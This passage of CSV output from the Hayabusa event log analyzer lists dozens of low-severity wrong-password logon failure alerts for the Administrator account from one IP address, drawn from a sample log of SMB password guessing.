NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7T8R8U1WVHZQrYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kamexpa7isWT8gLC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8CyHFKVcdTo0Upx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U30aMcZuBD08GWK1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4mihftSCNCYdlBny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K2wa0xwK6tnurGJQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0V3TbNrKEnrDcEYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T73JW9JURm8Br6MA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OAleyg3h8aMvVVJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LQllnWZFUIWa6rw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlwPxSGUmvYH0rpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrI56o5TyeO48rQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CKRMn75tv5Yi5rYK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MbJvec7rVisJ6WCC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xoubp5WTPqblBaps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBczkR92cKY41icQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfUx3OizEb1LiOzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRaSOLOWhBEr0qkz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YnlI8Zh4td5m1fpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wXUDXDa4wi3HivKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TT7iOtVMFcEysCcI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1NJpI7KC3gj99aWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H39cv9JEuLEjlp93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4p9h1cjLeUzppSZb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0fOpi4vr55QmO6x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GiKI4V6kpkY5zc9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dLmu4n9qZdf3Q5zo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 87iJdX2E0ZJintvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxc4iIHP0kdqQNiG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJIWekwBwcIUWjD1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GdnvboiIDzXTZ8MR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGMPHNpljTlMYeet | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWo4uVFtAbe4IjKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YAPdDqbMY4rYiuZ3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ai2WCQ3MkWwSeOy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ey1wbsD7w3fs02xP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sVGzidwZICNfLizg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zjGPMJ6RBw48Ejx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MydK8AjPvyyckCEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fqkCliAQMiFffQU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITkku4kN4csBFyUB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g9kMkSFhKrT2Py | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1xKLdwujTmLEc9ts | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sAW1YzCQ3CreseaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhqBirEHOKPepR3n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uqSFXpzAWOnc90n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: McbeS9lRpbMc48jO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6J0d7dQUmJNKJlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QG3WU91rhTP9odx7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSQRgB8yMfhb03g1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bzbZjRXTc0XvV4Ry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3ShOCSaLGX4YBWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lIrydzi8nmY251Z1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4vlRksTGxAqEt9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJMnD0foEDbcNfTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNWppBJLFojEFtiF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7a9Tvr6ruDpiG2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBNIizCKz2ybc3eM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YwuXQhISpgfSFqZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeONLdrrauxqvgaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RFqSH4toadsTideV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuMa0Juj1tjL6NDY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UA8zU0kJ6gAFqSaF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvX85gF8wk3AGJyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpzOMKQIBrkQW5Os | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqzrLAqHNi4CHT56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HWMap8qHlykO6Yeu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pkc9LWakJBjhBQv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y43cE75gTzA1XjHF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HopaYDAbYxHjJEr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: brNgudTWJaKs8nLd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzPwOqU92kdGodBH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXlzxK5OXL9hpqrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cLdgWvrVh7h2jPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h34xlYavVsXQRCYG | IP Addr: 192.168.198.149 | AuthPackage: 